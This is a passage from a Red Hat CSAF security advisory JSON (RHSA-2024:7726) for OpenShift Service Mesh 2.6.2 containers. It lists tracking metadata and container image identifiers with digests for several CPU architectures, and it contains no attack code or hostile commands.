"summary": "OSSM-8001",
"url": "https://issues.redhat.com/browse/OSSM-8001"
},
{
"category": "external",
"summary": "OSSM-8099",
"url": "https://issues.redhat.com/browse/OSSM-8099"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_7726.json"
}
],
"title": "Red Hat Security Advisory: Red Hat OpenShift Service Mesh Containers for 2.6.2",
"tracking": {
"current_release_date": "2025-11-21T19:13:59+00:00",
"generator": {
"date": "2025-11-21T19:13:59+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.6.12"
}
},
"id": "RHSA-2024:7726",
"initial_release_date": "2024-10-07T09:24:48+00:00",
"revision_history": [
{
"date": "2024-10-07T09:24:48+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2024-10-07T09:24:48+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2025-11-21T19:13:59+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "RHOSSM 2.6 for RHEL 8",
"product": {
"name": "RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:service_mesh:2.6::el8"
}
}
},
{
"category": "product_name",
"name": "RHOSSM 2.6 for RHEL 9",
"product": {
"name": "RHOSSM 2.6 for RHEL 9",
"product_id": "9Base-RHOSSM-2.6",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:service_mesh:2.6::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift Service Mesh"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"product": {
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"product_id": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8\u0026tag=1.89.2-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"product": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"product_id": "openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8\u0026tag=2.6.2-5"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"product": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"product_id": "openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8\u0026tag=2.6.2-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"product": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"product_id": "openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8\u0026tag=1.89.4-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"product": {
"name": "openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"product_id": "openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8-operator\u0026tag=1.89.6-1"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"product": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"product_id": "openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8\u0026tag=2.6.2-4"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"product": {
"name": "openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"product_id": "openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-rhel8-operator\u0026tag=2.6.2-5"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"product": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"product_id": "openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8\u0026tag=2.6.2-5"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"product": {
"name": "openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"product_id": "openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel9\u0026tag=2.6.2-7"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"product": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"product_id": "openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8\u0026tag=2.6.2-3"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"product": {
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"product_id": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8\u0026tag=1.89.2-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"product": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"product_id": "openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"product_identification_helper": {
"purl": "pkg:oci/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8\u0026tag=2.6.2-5"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"product": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"product_id": "openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"product_identification_helper": {
"purl": "pkg:oci/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8\u0026tag=2.6.2-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"product": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"product_id": "openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8\u0026tag=1.89.4-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"product": {
"name": "openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"product_id": "openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8-operator\u0026tag=1.89.6-1"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"product": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"product_id": "openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"product_identification_helper": {
"purl": "pkg:oci/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8\u0026tag=2.6.2-4"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"product": {
"name": "openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"product_id": "openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"product_identification_helper": {
"purl": "pkg:oci/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-rhel8-operator\u0026tag=2.6.2-5"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"product": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"product_id": "openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8\u0026tag=2.6.2-5"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64",
"product": {
"name": "openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64",
"product_id": "openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64",
"product_identification_helper": {
"purl": "pkg:oci/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel9\u0026tag=2.6.2-7"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"product": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"product_id": "openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"product_identification_helper": {
"purl": "pkg:oci/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8\u0026tag=2.6.2-3"
}
}
}
],
"category": "architecture",
"name": "arm64"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"product": {
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"product_id": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8\u0026tag=1.89.2-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"product": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"product_id": "openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"product_identification_helper": {
"purl": "pkg:oci/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8\u0026tag=2.6.2-5"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"product": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"product_id": "openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8\u0026tag=2.6.2-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"product": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"product_id": "openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8\u0026tag=1.89.4-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"product": {
"name": "openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"product_id": "openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8-operator\u0026tag=1.89.6-1"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"product": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"product_id": "openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"product_identification_helper": {
"purl": "pkg:oci/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8\u0026tag=2.6.2-4"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"product": {
"name": "openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"product_id": "openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"product_identification_helper": {
"purl": "pkg:oci/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-rhel8-operator\u0026tag=2.6.2-5"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"product": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"product_id": "openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8\u0026tag=2.6.2-5"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"product": {
"name": "openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"product_id": "openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"product_identification_helper": {
"purl": "pkg:oci/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel9\u0026tag=2.6.2-7"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"product": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"product_id": "openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8\u0026tag=2.6.2-3"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"product": {
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"product_id": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8\u0026tag=1.89.2-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"product": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"product_id": "openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"product_identification_helper": {
"purl": "pkg:oci/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8\u0026tag=2.6.2-5"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"product": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"product_id": "openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"product_identification_helper": {
"purl": "pkg:oci/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8\u0026tag=2.6.2-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"product": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"product_id": "openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8\u0026tag=1.89.4-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"product": {
"name": "openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"product_id": "openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8-operator\u0026tag=1.89.6-1"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"product": {
